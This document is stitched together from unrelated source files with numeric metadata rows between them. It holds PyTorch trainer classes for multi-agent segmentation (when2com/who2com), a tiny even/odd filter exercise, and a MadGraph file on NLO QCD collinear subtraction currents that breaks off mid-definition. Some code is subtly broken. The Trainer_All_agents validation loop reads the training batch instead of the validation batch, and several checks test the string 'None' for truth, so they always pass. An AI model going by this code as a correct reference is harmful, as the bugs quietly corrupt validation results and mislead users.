self.optimizer.load_state_dict(checkpoint["optimizer_state"])
self.scheduler.load_state_dict(checkpoint["scheduler_state"])
start_iter = checkpoint["epoch"]
self.logger.info(
"Loaded checkpoint '{}' (iter {})".format(
self.cfg["training"]["resume"], checkpoint["epoch"]
)
)
else:
self.logger.info("No checkpoint found at '{}'".format(self.cfg["training"]["resume"]))
val_loss_meter = averageMeter()
time_meter = averageMeter()
best_iou = -100.0
i = start_iter
flag = True
# training
while i <= self.cfg["training"]["train_iters"] and flag:
for data_list in self.trainloader:
i += 1
start_ts = time.time()
if self.if_commun_label != 'None':
images_list, labels_list, commun_label = data_list
else:
images_list, labels_list = data_list
images = torch.cat(tuple(images_list), dim=1)
if self.MO_flag: # multiple output
labels = torch.cat(tuple(labels_list), dim=0)
else: # single output
labels = labels_list[0]
self.scheduler.step()
self.model.train() # matters for batchnorm/dropout
images = images.to(self.device)
labels = labels.to(self.device)
if self.if_commun_label != 'None':
commun_label = commun_label.to(self.device)
# image loss
self.optimizer.zero_grad()
outputs, log_action, action_argmax, _ = self.model(images, training=True, MO_flag=self.MO_flag)
loss = self.loss_fn(input=outputs, target=labels)
loss.backward()
self.optimizer.step()
time_meter.update(time.time() - start_ts)
# Process display on screen
if (i + 1) % self.cfg["training"]["print_interval"] == 0:
fmt_str = "Iter [{:d}/{:d}] Loss: {:.4f} Time/Image: {:.4f}"
print_str = fmt_str.format(
i + 1,
self.cfg["training"]["train_iters"],
loss.item(),
time_meter.avg / self.cfg["training"]["batch_size"],
)
print(print_str)
self.logger.info(print_str)
self.writer.add_scalar("loss/train_loss", loss.item(), i + 1)
time_meter.reset()
### Validation
if i % self.cfg["training"]["val_interval"] == 0 or i == self.cfg["training"]["train_iters"]:
self.model.eval()
with torch.no_grad():
for i_val, data_list in tqdm(enumerate(self.valloader)):
if self.if_commun_label != 'None':
images_val_list, labels_val_list, commun_label = data_list
commun_label = commun_label.to(self.device)
else:
images_val_list, labels_val_list = data_list
images_val = torch.cat(tuple(images_val_list), dim=1)
if self.MO_flag: # obtain multiple ground-truth
labels_val = torch.cat(tuple(labels_val_list), dim=0)
else: # only select one view gt mask
labels_val = labels_val_list[0]
labels_val = labels_val.to(self.device)
images_val = images_val.to(self.device)
gt = labels_val.data.cpu().numpy()
# image loss
outputs, _, action_argmax, _ = self.model(images_val, training=True, MO_flag=self.MO_flag)
val_loss = self.loss_fn(input=outputs, target=labels_val)
pred = outputs.data.max(1)[1].cpu().numpy()
# compute action accuracy
if self.if_commun_label != 'None':
self.running_metrics_val.update_div(self.if_commun_label, gt, pred, commun_label)
self.running_metrics_val.update_selection(self.if_commun_label, commun_label, action_argmax)
self.running_metrics_val.update(gt, pred)
val_loss_meter.update(val_loss.item())
if self.if_commun_label != 'None':
when2com_acc, who2com_acc = self.running_metrics_val.get_selection_accuracy()
print('Validation when2com accuracy:{}'.format(when2com_acc))
print('Validation who2com accuracy:{}'.format(who2com_acc))
self.writer.add_scalar("val_metrics/when_com_accuacy", when2com_acc, i)
self.writer.add_scalar("val_metrics/who_com_accuracy", who2com_acc, i)
self.writer.add_scalar("loss/val_loss", val_loss_meter.avg, i)
self.logger.info("Iter %d Loss: %.4f" % (i, val_loss_meter.avg))
print('Normal')
score, class_iou = self.running_metrics_val.get_only_normal_scores()
self.running_metrics_val.print_score(self.n_classes, score, class_iou)
print('Noise')
score, class_iou = self.running_metrics_val.get_only_noise_scores()
self.running_metrics_val.print_score(self.n_classes, score, class_iou)
print("Overall")
score, class_iou = self.running_metrics_val.get_scores()
self.running_metrics_val.print_score(self.n_classes, score, class_iou)
val_loss_meter.reset()
self.running_metrics_val.reset()
# store the best model
if score["Mean IoU : \t"] >= best_iou:
best_iou = score["Mean IoU : \t"]
state = {
"epoch": i,
"model_state": self.model.state_dict(),
"optimizer_state": self.optimizer.state_dict(),
"scheduler_state": self.scheduler.state_dict(),
"best_iou": best_iou,
}
save_path = os.path.join(
self.writer.file_writer.get_logdir(),
"{}_{}_best_model.pkl".format(self.cfg["model"]["arch"], self.cfg["data"]["dataset"]),
)
torch.save(state, save_path)
if i == self.cfg["training"]["train_iters"]:
flag = False
break
return save_path
def load_weight(self, model_path):
state = convert_state_dict(torch.load(model_path)["model_state"])
self.model.load_state_dict(state, strict=False)
def evaluate(self, testloader,inference_mode='activated'): # "val_split"
running_metrics = runningScore(self.n_classes)
# Setup Model
self.model.eval()
self.model.to(self.device)
for i, data_list in enumerate(testloader):
if self.if_commun_label:
images_list, labels_list, commun_label = data_list
commun_label = commun_label.to(self.device)
else:
images_list, labels_list = data_list
# multi-view inputs
images = torch.cat(tuple(images_list), dim=1)
# multiple output
if self.MO_flag:
labels = torch.cat(tuple(labels_list), dim=0)
else: # single output
labels = labels_list[0]
images = images.to(self.device)
outputs, _, action_argmax, bandW = self.model(images, training=False, MO_flag=self.MO_flag, inference=inference_mode)
pred = outputs.data.max(1)[1].cpu().numpy()
gt = labels.numpy()
# measurement results
running_metrics.update(gt, pred)
running_metrics.update_bandW(bandW)
if self.if_commun_label:
running_metrics.update_div(self.if_commun_label, gt, pred, commun_label)
running_metrics.update_selection(self.if_commun_label, commun_label, action_argmax)
if self.if_commun_label:
when2com_acc, who2com_acc = running_metrics.get_selection_accuracy()
print('Validation when2com accuracy:{}'.format(when2com_acc))
print('Validation who2com accuracy:{}'.format(who2com_acc))
else:
when2com_acc = 0
who2com_acc = 0
avg_bandW = running_metrics.get_avg_bandW()
print('Bandwidth: ' + str(avg_bandW))
print('Normal')
score, class_iou = running_metrics.get_only_normal_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
print('Noise')
score, class_iou = running_metrics.get_only_noise_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
print("Overall")
score, class_iou = running_metrics.get_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
return score, class_iou
class Trainer_MIMO_All_agents(object):
def __init__(self, cfg, writer, logger, model, loss_fn, trainloader, valloader, optimizer, scheduler, device):
self.cfg = cfg
self.writer = writer
self.logger = logger
self.model = model
self.trainloader = trainloader
self.valloader = valloader
self.optimizer = optimizer
self.scheduler = scheduler
self.n_classes = 11
self.loss_fn = loss_fn
self.running_metrics_val = runningScore(self.n_classes)
self.device = device
self.MO_flag = self.cfg['model']['multiple_output']
if 'commun_label' in self.cfg["data"]:
self.if_commun_label = cfg["data"]['commun_label']
else:
self.if_commun_label = 'None'
def train(self):
print('MIMO_All_Agent_Trainer')
start_iter = 0
if self.cfg["training"]["resume"] is not None:
if os.path.isfile(self.cfg["training"]["resume"]):
self.logger.info(
"Loading model and optimizer from checkpoint '{}'".format(self.cfg["training"]["resume"])
)
checkpoint = torch.load(self.cfg["training"]["resume"])
self.model.load_state_dict(checkpoint["model_state"])
self.optimizer.load_state_dict(checkpoint["optimizer_state"])
self.scheduler.load_state_dict(checkpoint["scheduler_state"])
start_iter = checkpoint["epoch"]
self.logger.info(
"Loaded checkpoint '{}' (iter {})".format(
self.cfg["training"]["resume"], checkpoint["epoch"]
)
)
else:
self.logger.info("No checkpoint found at '{}'".format(self.cfg["training"]["resume"]))
val_loss_meter = averageMeter()
time_meter = averageMeter()
best_iou = -100.0
i = start_iter
flag = True
while i <= self.cfg["training"]["train_iters"] and flag:
for data_list in self.trainloader:
if self.if_commun_label != 'None':
images_list, labels_list, commun_label = data_list
else:
images_list, labels_list = data_list
# only first image
images = images_list[0]
labels = labels_list[0]
images_list[0] = images
images = torch.cat(tuple(images_list), dim=1)
if self.cfg['model']['multiple_output']:
labels = torch.cat(tuple(labels_list), dim=0)
i += 1
start_ts = time.time()
self.scheduler.step()
self.model.train() # matters for batchnorm/dropout
images = images.to(self.device)
labels = labels.to(self.device)
self.optimizer.zero_grad()
if self.cfg['model']['shuffle_features'] == 'selection':
outputs, rand_action = self.model(images)
else:
outputs = self.model(images)
loss = self.loss_fn(input=outputs, target=labels)
loss.backward()
self.optimizer.step()
time_meter.update(time.time() - start_ts)
# Process display on screen
if i % self.cfg["training"]["print_interval"] == 0:
fmt_str = "Iter [{:d}/{:d}] Loss: {:.4f} Time/Image: {:.4f}"
print_str = fmt_str.format(
i,
self.cfg["training"]["train_iters"],
loss.item(),
time_meter.avg / self.cfg["training"]["batch_size"],
)
print(print_str)
self.logger.info(print_str)
self.writer.add_scalar("loss/train_loss", loss.item(), i)
time_meter.reset()
# Validation
if (i) % self.cfg["training"]["val_interval"] == 0 or (i) == self.cfg["training"]["train_iters"]:
self.model.eval()
with torch.no_grad():
for i_val, (data_list) in tqdm(enumerate(self.valloader), ncols=20,
desc='Validation'):
if self.if_commun_label != 'None':
images_val_list, labels_val_list, commun_label = data_list
else:
images_val_list, labels_val_list = data_list
images_val = torch.cat(tuple(images_val_list), dim=1)
labels_val = labels_val_list[0]
if self.cfg['model']['multiple_output']: # mimo single
labels_val = torch.cat(tuple(labels_val_list), dim=0)
images_val = images_val.to(self.device)
labels_val = labels_val.to(self.device)
if self.cfg['model']['shuffle_features'] == 'selection':
outputs, rand_action = self.model(images_val)
else:
outputs = self.model(images_val)
val_loss = self.loss_fn(input=outputs, target=labels_val)
pred = outputs.data.max(1)[1].cpu().numpy()
gt = labels_val.data.cpu().numpy()
self.running_metrics_val.update(gt, pred)
val_loss_meter.update(val_loss.item())
self.writer.add_scalar("loss/val_loss", val_loss_meter.avg, i)
self.logger.info("Iter %d Loss: %.4f" % (i, val_loss_meter.avg))
score, class_iou = self.running_metrics_val.get_scores()
for k, v in score.items():
print(k, v)
self.logger.info("{}: {}".format(k, v))
self.writer.add_scalar("val_metrics/{}".format(k), v, i)
for k, v in class_iou.items():
self.logger.info("{}: {}".format(k, v))
self.writer.add_scalar("val_metrics/cls_{}".format(k), v, i)
val_loss_meter.reset()
self.running_metrics_val.reset()
if score["Mean IoU : \t"] >= best_iou:
best_iou = score["Mean IoU : \t"]
state = {
"epoch": i,
"model_state": self.model.state_dict(),
"optimizer_state": self.optimizer.state_dict(),
"scheduler_state": self.scheduler.state_dict(),
"best_iou": best_iou,
}
save_path = os.path.join(
self.writer.file_writer.get_logdir(),
"{}_{}_best_model.pkl".format(self.cfg["model"]["arch"], self.cfg["data"]["dataset"]),
)
torch.save(state, save_path)
if i == self.cfg["training"]["train_iters"]:
flag = False
break
return save_path
def load_weight(self, model_path):
state = convert_state_dict(torch.load(model_path)["model_state"])
self.model.load_state_dict(state, strict=False)
def evaluate(self, testloader): # "val_split"
running_metrics = runningScore(self.n_classes)
# Setup Model
self.model.eval()
self.model.to(self.device)
for i, data_list in enumerate(testloader):
if self.if_commun_label:
images_list, labels_list, commun_label = data_list
commun_label = commun_label.to(self.device)
else:
images_list, labels_list = data_list
# multi-view inputs
images = torch.cat(tuple(images_list), dim=1)
# multi-view output
if self.MO_flag:
labels = torch.cat(tuple(labels_list), dim=0)
else: # single output
labels = labels_list[0]
images = images.to(self.device)
# MODEL INFERENCE
if self.cfg['model']['shuffle_features'] == 'selection':
outputs, action_argmax = self.model(images)
else:
outputs = self.model(images)
pred = outputs.data.max(1)[1].cpu().numpy()
gt = labels.numpy()
# measurement results
running_metrics.update(gt, pred)
if self.if_commun_label:
running_metrics.update_div(self.if_commun_label, gt, pred, commun_label)
print('Normal')
score, class_iou = running_metrics.get_only_normal_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
print('Noise')
score, class_iou = running_metrics.get_only_noise_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
print("Overall")
score, class_iou = running_metrics.get_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
return score, class_iou
class Trainer_Single_agent(object):
def __init__(self, cfg, writer, logger, model, loss_fn, trainloader, valloader, optimizer, scheduler, device):
self.cfg = cfg
self.writer = writer
self.logger = logger
self.model = model
self.trainloader = trainloader
self.valloader = valloader
self.optimizer = optimizer
self.scheduler = scheduler
self.n_classes = 11
self.loss_fn = loss_fn
self.running_metrics_val = runningScore(self.n_classes)
self.device = device
self.MO_flag = self.cfg['model']['multiple_output']
def train(self):
print('Training')
start_iter = 0
if self.cfg["training"]["resume"] is not None:
if os.path.isfile(self.cfg["training"]["resume"]):
self.logger.info(
"Loading model and optimizer from checkpoint '{}'".format(self.cfg["training"]["resume"])
)
checkpoint = torch.load(self.cfg["training"]["resume"])
self.model.load_state_dict(checkpoint["model_state"])
self.optimizer.load_state_dict(checkpoint["optimizer_state"])
self.scheduler.load_state_dict(checkpoint["scheduler_state"])
start_iter = checkpoint["epoch"]
self.logger.info(
"Loaded checkpoint '{}' (iter {})".format(
self.cfg["training"]["resume"], checkpoint["epoch"]
)
)
else:
self.logger.info("No checkpoint found at '{}'".format(self.cfg["training"]["resume"]))
val_loss_meter = averageMeter()
time_meter = averageMeter()
best_iou = -100.0
i = start_iter
flag = True
while i <= self.cfg["training"]["train_iters"] and flag:
for data_list in self.trainloader:
images_list, labels_list = data_list
# only first image
images = images_list[0]
labels = labels_list[0]
if self.cfg['model']['multiple_output']: # mimo single
labels = torch.cat(tuple(labels_list), dim=0)
images = torch.cat(tuple(images_list), dim=0)
i += 1
start_ts = time.time()
self.scheduler.step()
self.model.train() # matters for batchnorm/dropout
images = images.to(self.device)
labels = labels.to(self.device)
self.optimizer.zero_grad()
outputs = self.model(images)
loss = self.loss_fn(input=outputs, target=labels)
loss.backward()
self.optimizer.step()
time_meter.update(time.time() - start_ts)
# Process display on screen
if i % self.cfg["training"]["print_interval"] == 0:
fmt_str = "Iter [{:d}/{:d}] Loss: {:.4f} Time/Image: {:.4f}"
print_str = fmt_str.format(
i,
self.cfg["training"]["train_iters"],
loss.item(),
time_meter.avg / self.cfg["training"]["batch_size"],
)
print(print_str)
self.logger.info(print_str)
self.writer.add_scalar("loss/train_loss", loss.item(), i)
time_meter.reset()
# Validation
if i % self.cfg["training"]["val_interval"] == 0 or i == self.cfg["training"]["train_iters"]:
self.model.eval()
with torch.no_grad():
for i_val, (images_val_list, labels_val_list) in tqdm(enumerate(self.valloader), ncols=20,
desc='Validation'):
images_val = images_val_list[0]
labels_val = labels_val_list[0]
if self.cfg['model']['multiple_output']: # mimo single
labels_val = torch.cat(tuple(labels_val_list), dim=0)
if self.cfg["model"]["arch"] == 'Single_agent':
images_val = torch.cat(tuple(images_val_list), dim=0)
images_val = images_val.to(self.device)
labels_val = labels_val.to(self.device)
outputs = self.model(images_val)
val_loss = self.loss_fn(input=outputs, target=labels_val)
pred = outputs.data.max(1)[1].cpu().numpy()
gt = labels_val.data.cpu().numpy()
self.running_metrics_val.update(gt, pred)
val_loss_meter.update(val_loss.item())
self.writer.add_scalar("loss/val_loss", val_loss_meter.avg, i)
self.logger.info("Iter %d Loss: %.4f" % (i, val_loss_meter.avg))
score, class_iou = self.running_metrics_val.get_scores()
for k, v in score.items():
print(k, v)
self.logger.info("{}: {}".format(k, v))
self.writer.add_scalar("val_metrics/{}".format(k), v, i)
for k, v in class_iou.items():
self.logger.info("{}: {}".format(k, v))
self.writer.add_scalar("val_metrics/cls_{}".format(k), v, i)
val_loss_meter.reset()
self.running_metrics_val.reset()
if score["Mean IoU : \t"] >= best_iou:
best_iou = score["Mean IoU : \t"]
state = {
"epoch": i,
"model_state": self.model.state_dict(),
"optimizer_state": self.optimizer.state_dict(),
"scheduler_state": self.scheduler.state_dict(),
"best_iou": best_iou,
}
save_path = os.path.join(
self.writer.file_writer.get_logdir(),
"{}_{}_best_model.pkl".format(self.cfg["model"]["arch"], self.cfg["data"]["dataset"]),
)
torch.save(state, save_path)
if i == self.cfg["training"]["train_iters"]:
flag = False
break
return save_path
def load_weight(self, model_path):
state = convert_state_dict(torch.load(model_path)["model_state"])
self.model.load_state_dict(state, strict=False)
def evaluate(self, testloader):
# local evalutation metric
running_metrics = runningScore(self.n_classes)
# Setup Model for evaluaton model
self.model.eval()
self.model.to(self.device)
for i, data_list in enumerate(testloader):
images_list, labels_list = data_list
# multi-view inputs
images = torch.cat(tuple(images_list), dim=0)
# multi-view output
if self.cfg['model']['multiple_output']:
labels = torch.cat(tuple(labels_list), dim=0)
else: # single output
labels = labels_list[0]
images = images.to(self.device)
outputs = self.model(images)
pred = outputs.data.max(1)[1].cpu().numpy()
gt = labels.numpy()
# measurement results
running_metrics.update(gt, pred)
print("Overall")
score, class_iou = running_metrics.get_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
return score, class_iou
class Trainer_All_agents(object):
def __init__(self, cfg, writer, logger, model, loss_fn, trainloader, valloader, optimizer, scheduler, device):
self.cfg = cfg
self.writer = writer
self.logger = logger
self.model = model
self.trainloader = trainloader
self.valloader = valloader
self.optimizer = optimizer
self.scheduler = scheduler
self.n_classes = 11
self.loss_fn = loss_fn
self.running_metrics_val = runningScore(self.n_classes)
self.device = device
self.MO_flag = self.cfg['model']['multiple_output']
if 'commun_label' in self.cfg["data"]:
self.if_commun_label = cfg["data"]['commun_label']
else:
self.if_commun_label = 'None'
def train(self):
print('Training')
start_iter = 0
if self.cfg["training"]["resume"] is not None:
if os.path.isfile(self.cfg["training"]["resume"]):
self.logger.info(
"Loading model and optimizer from checkpoint '{}'".format(self.cfg["training"]["resume"])
)
checkpoint = torch.load(self.cfg["training"]["resume"])
self.model.load_state_dict(checkpoint["model_state"])
self.optimizer.load_state_dict(checkpoint["optimizer_state"])
self.scheduler.load_state_dict(checkpoint["scheduler_state"])
start_iter = checkpoint["epoch"]
self.logger.info(
"Loaded checkpoint '{}' (iter {})".format(
self.cfg["training"]["resume"], checkpoint["epoch"]
)
)
else:
self.logger.info("No checkpoint found at '{}'".format(self.cfg["training"]["resume"]))
val_loss_meter = averageMeter()
time_meter = averageMeter()
best_iou = -100.0
i = start_iter
flag = True
while i <= self.cfg["training"]["train_iters"] and flag:
for data_list in self.trainloader:
if self.if_commun_label != 'None':
images_list, labels_list, commun_label = data_list
else:
images_list, labels_list = data_list
images = torch.cat(tuple(images_list), dim=1)
labels = labels_list[0]
if self.cfg['model']['multiple_output']: # multiple output
labels = torch.cat(tuple(labels_list), dim=0)
i += 1
start_ts = time.time()
self.scheduler.step()
self.model.train()
images = images.to(self.device)
labels = labels.to(self.device)
self.optimizer.zero_grad()
if self.cfg['model']['shuffle_features'] == 'selection': # randcom
outputs, rand_action = self.model(images)
else: # catall
outputs = self.model(images)
loss = self.loss_fn(input=outputs, target=labels)
loss.backward()
self.optimizer.step()
time_meter.update(time.time() - start_ts)
# Process display on screen
if i % self.cfg["training"]["print_interval"] == 0:
fmt_str = "Iter [{:d}/{:d}] Loss: {:.4f} Time/Image: {:.4f}"
print_str = fmt_str.format(
i,
self.cfg["training"]["train_iters"],
loss.item(),
time_meter.avg / self.cfg["training"]["batch_size"],
)
print(print_str)
self.logger.info(print_str)
self.writer.add_scalar("loss/train_loss", loss.item(), i)
time_meter.reset()
# Validation
if i % self.cfg["training"]["val_interval"] == 0 or i == self.cfg["training"]["train_iters"]:
self.model.eval()
with torch.no_grad():
for i_val, (data_val_list) in tqdm(enumerate(self.valloader), ncols=20,
desc='Validation'):
if self.if_commun_label != 'None':
images_val_list, labels_val_list, commun_label = data_list
else:
images_val_list, labels_val_list = data_list
images_val = torch.cat(tuple(images_val_list), dim=1)
labels_val = labels_val_list[0]
if self.cfg['model']['multiple_output']:
labels_val = torch.cat(tuple(labels_val_list), dim=0)
images_val = images_val.to(self.device)
labels_val = labels_val.to(self.device)
if self.cfg['model']['shuffle_features'] == 'selection':
outputs, rand_action = self.model(images_val)
else:
outputs = self.model(images_val)
val_loss = self.loss_fn(input=outputs, target=labels_val)
pred = outputs.data.max(1)[1].cpu().numpy()
gt = labels_val.data.cpu().numpy()
self.running_metrics_val.update(gt, pred)
val_loss_meter.update(val_loss.item())
self.writer.add_scalar("loss/val_loss", val_loss_meter.avg, i)
self.logger.info("Iter %d Loss: %.4f" % (i, val_loss_meter.avg))
score, class_iou = self.running_metrics_val.get_scores()
for k, v in score.items():
print(k, v)
self.logger.info("{}: {}".format(k, v))
self.writer.add_scalar("val_metrics/{}".format(k), v, i)
for k, v in class_iou.items():
self.logger.info("{}: {}".format(k, v))
self.writer.add_scalar("val_metrics/cls_{}".format(k), v, i)
val_loss_meter.reset()
self.running_metrics_val.reset()
if score["Mean IoU : \t"] >= best_iou:
best_iou = score["Mean IoU : \t"]
state = {
"epoch": i,
"model_state": self.model.state_dict(),
"optimizer_state": self.optimizer.state_dict(),
"scheduler_state": self.scheduler.state_dict(),
"best_iou": best_iou,
}
save_path = os.path.join(
self.writer.file_writer.get_logdir(),
"{}_{}_best_model.pkl".format(self.cfg["model"]["arch"], self.cfg["data"]["dataset"]),
)
torch.save(state, save_path)
if i == self.cfg["training"]["train_iters"]:
flag = False
break
return save_path
def load_weight(self, model_path):
state = convert_state_dict(torch.load(model_path)["model_state"])
self.model.load_state_dict(state, strict=False)
def evaluate(self, testloader): # "val_split"
running_metrics = runningScore(self.n_classes)
# Setup Model
self.model.eval()
self.model.to(self.device)
for i, data_list in enumerate(testloader):
if self.if_commun_label:
images_list, labels_list, commun_label = data_list
commun_label = commun_label.to(self.device)
else:
images_list, labels_list = data_list
# multi-view inputs
images = torch.cat(tuple(images_list), dim=1)
# multi-view output
if self.MO_flag:
labels = torch.cat(tuple(labels_list), dim=0)
else: # single output
labels = labels_list[0]
images = images.to(self.device)
if self.cfg['model']['shuffle_features'] == 'selection':
outputs, rand_action = self.model(images)
else:
outputs = self.model(images)
pred = outputs.data.max(1)[1].cpu().numpy()
gt = labels.numpy()
# measurement results
running_metrics.update(gt, pred)
if self.if_commun_label:
running_metrics.update_div(self.if_commun_label, gt, pred, commun_label)
print('Normal')
score, class_iou = running_metrics.get_only_normal_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
print('Noise')
score, class_iou = running_metrics.get_only_noise_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
print("Overall")
score, class_iou = running_metrics.get_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
return score, class_iou
| 41.428247
| 129
| 0.520455
| 7,706
| 73,038
| 4.692447
| 0.034129
| 0.04411
| 0.036919
| 0.032909
| 0.974087
| 0.972566
| 0.971709
| 0.970326
| 0.966289
| 0.963523
| 0
| 0.006241
| 0.376941
| 73,038
| 1,762
| 130
| 41.451759
| 0.788362
| 0.033763
| 0
| 0.9274
| 0
| 0
| 0.089682
| 0.005182
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021858
| false
| 0
| 0.020297
| 0
| 0.058548
| 0.089774
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
70e0809c445d27e93089ec7bbc4649124ba6425a
| 325
|
py
|
Python
|
Python-Advanced/functions_advanced_exercise/even_or_odd.py
|
Xamaneone/SoftUni-Intro
|
985fe3249cd2adf021c2003372e840219811d989
|
[
"MIT"
] | null | null | null |
Python-Advanced/functions_advanced_exercise/even_or_odd.py
|
Xamaneone/SoftUni-Intro
|
985fe3249cd2adf021c2003372e840219811d989
|
[
"MIT"
] | null | null | null |
Python-Advanced/functions_advanced_exercise/even_or_odd.py
|
Xamaneone/SoftUni-Intro
|
985fe3249cd2adf021c2003372e840219811d989
|
[
"MIT"
] | null | null | null |
def even_odd(*args):
if "even" in args:
return list(filter(lambda x: x % 2 == 0, [args[i] for i in range(len(args) - 1)]))
return list(filter(lambda x: x % 2 == 1, [args[i] for i in range(len(args) - 1)]))
# print(even_odd(1, 2, 3, 4, 5, 6, "even"))
# print(even_odd(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, "odd"))
| 32.5
| 90
| 0.544615
| 66
| 325
| 2.636364
| 0.409091
| 0.12069
| 0.183908
| 0.252874
| 0.770115
| 0.770115
| 0.770115
| 0.482759
| 0.482759
| 0
| 0
| 0.092
| 0.230769
| 325
| 9
| 91
| 36.111111
| 0.604
| 0.292308
| 0
| 0
| 0
| 0
| 0.017621
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
cb06f57df731fc6db65a2e8f3bf56e18f777cdd9
| 37,554
|
py
|
Python
|
madgraph/iolibs/template_files/OLD_subtraction/cataniseymour/NLO/local_currents.py
|
madnklo/madnklo
|
646a3db9c8efd7b4cb00e9d89b9197cd5394c01b
|
[
"NCSA"
] | 1
|
2019-12-14T15:25:38.000Z
|
2019-12-14T15:25:38.000Z
|
madgraph/iolibs/template_files/OLD_subtraction/cataniseymour/NLO/local_currents.py
|
madnklo/madnklo
|
646a3db9c8efd7b4cb00e9d89b9197cd5394c01b
|
[
"NCSA"
] | 26
|
2018-10-08T15:49:32.000Z
|
2020-05-15T13:33:36.000Z
|
madgraph/iolibs/template_files/OLD_subtraction/cataniseymour/NLO/local_currents.py
|
madnklo/madnklo
|
646a3db9c8efd7b4cb00e9d89b9197cd5394c01b
|
[
"NCSA"
] | 2
|
2019-03-25T17:28:48.000Z
|
2021-04-21T12:15:53.000Z
|
##########################################################################################
#
# Copyright (c) 2009 The MadGraph5_aMC@NLO Development team and Contributors
#
# This file is a part of the MadGraph5_aMC@NLO project, an application which
# automatically generates Feynman diagrams and matrix elements for arbitrary
# high-energy processes in the Standard Model and beyond.
#
# It is subject to the MadGraph5_aMC@NLO license which should accompany this
# distribution.
#
# For more information, visit madgraph.phys.ucl.ac.be and amcatnlo.web.cern.ch
#
##########################################################################################
"""Implementation of NLO colorful currents."""
import os
import math
import commons.utils as utils
import commons.QCD_local_currents as currents
pjoin = os.path.join
CurrentImplementationError = utils.CurrentImplementationError
#=========================================================================================
# Eikonal factor, modified by partial fractioning and without divergence
#=========================================================================================
def mod_eikonal(pi, pj, pr):
"""Modified eikonal factor for soft particle with momentum pr
emitted from the dipole with momenta pi and pj.
This is obtained starting from the eikonal and:
- ignoring 1 / sir, which is already included in the normalisation factor;
- multiplying by the partial fraction sjr / (sir + sjr) to regulate for sjr -> 0.
"""
pipj = pi.dot(pj)
pijpr = pr.dot(pi+pj)
return 2 * pipj / pijpr
#=========================================================================================
# NLO final-collinear currents, containing the soft limits
#=========================================================================================
class QCD_final_collinear_0_qqx(currents.QCDLocalCollinearCurrent):
"""q q~ collinear tree-level current."""
@classmethod
def does_implement_this_current(cls, current, model):
# Check the general properties common to NLO QCD collinear tree-level currents
init_vars = cls.common_does_implement_this_current(current, 2, 0)
if init_vars is None: return None
# Retrieve singular structure
ss = current.get('singular_structure')
# Check that the particles are a massless quark and its anti-quark in final-state
if len(ss.legs) != 2: return None
for leg in ss.legs:
if not cls.is_quark(leg, model): return None
if not cls.is_massless(leg, model): return None
if cls.is_initial(leg): return None
if not cls.are_antiparticles(ss.legs[0], ss.legs[1]): return None
# The current is valid
return init_vars
@classmethod
def get_sorted_children(cls, current, model):
legs = current.get('singular_structure').legs
return tuple(leg.n for leg in legs)
def evaluate_kernel(self, zs, kTs, parent):
# Retrieve the collinear variables
z = zs[0]
kT = kTs[0]
# Instantiate the structure of the result
evaluation = utils.SubtractionCurrentEvaluation({
'spin_correlations' : [None, ((parent, (kT, )), ), ],
'color_correlations' : [None],
'values' : {(0, 0): {'finite': None},
(1, 0): {'finite': None}, }
})
# The line below implements the g_{\mu\nu} part of the splitting kernel.
# Notice that the extra longitudinal terms included in the spin-correlation 'None'
# from the relation:
# \sum_\lambda \epsilon_\lambda^\mu \epsilon_\lambda^{\star\nu}
# = g^{\mu\nu} + longitudinal terms
# are irrelevant because Ward identities evaluate them to zero anyway.
# WARNING multiplied by two because of flavor factors
evaluation['values'][(0, 0)]['finite'] = 2. * self.TR
evaluation['values'][(1, 0)]['finite'] = 2. * 4. * self.TR * z*(1.-z) / kT.square()
return evaluation
class QCD_final_collinear_0_gq(currents.QCDLocalCollinearCurrent):
"""g q collinear tree-level current."""
@classmethod
def does_implement_this_current(cls, current, model):
# Check the general properties common to NLO QCD collinear tree-level currents
init_vars = cls.common_does_implement_this_current(current, 2, 0)
if init_vars is None: return None
# Retrieve singular structure
ss = current.get('singular_structure')
# Check that all particles are massless final state
for leg in ss.legs:
if not cls.is_massless(leg, model): return None
if cls.is_initial(leg): return None
# Check that there are a quark and a gluon
if len(ss.legs) != 2: return None
if (cls.is_gluon(ss.legs[0], model) and cls.is_quark(ss.legs[1], model)):
pass
elif (cls.is_quark(ss.legs[0], model) and cls.is_gluon(ss.legs[1], model)):
pass
else:
return None
# The current is valid
return init_vars
@classmethod
def get_sorted_children(cls, current, model):
legs = current.get('singular_structure').legs
if cls.is_gluon(legs[0], model): return (legs[0].n, legs[1].n)
else: return (legs[1].n, legs[0].n)
def evaluate_kernel(self, zs, kTs, parent):
# Retrieve the collinear variables
z = zs[0]
# Instantiate the structure of the result
evaluation = utils.SubtractionCurrentEvaluation({
'spin_correlations' : [None],
'color_correlations' : [None],
'values' : {(0, 0): {'finite': None}}
})
# We must subtract the soft-collinear (CxS *not* SxC) from this contribution:
# P_gq = self.CF * ((1.-z)**2 + 1.)/z
# CxS(P_gq) = self.CF * 2.*(1.-z) / z
# SxC(P_gq) = self.CF * 2. / z
# P_gq-CxS(P_gq) = self.CF * z
# P_gq-SxC(P_gq) = self.CF * ((1.-z)**2 - 1.)/z
evaluation['values'][(0, 0)]['finite'] = self.CF * z
return evaluation
def evaluate_subtraction_current(
self, current,
higher_PS_point=None, lower_PS_point=None,
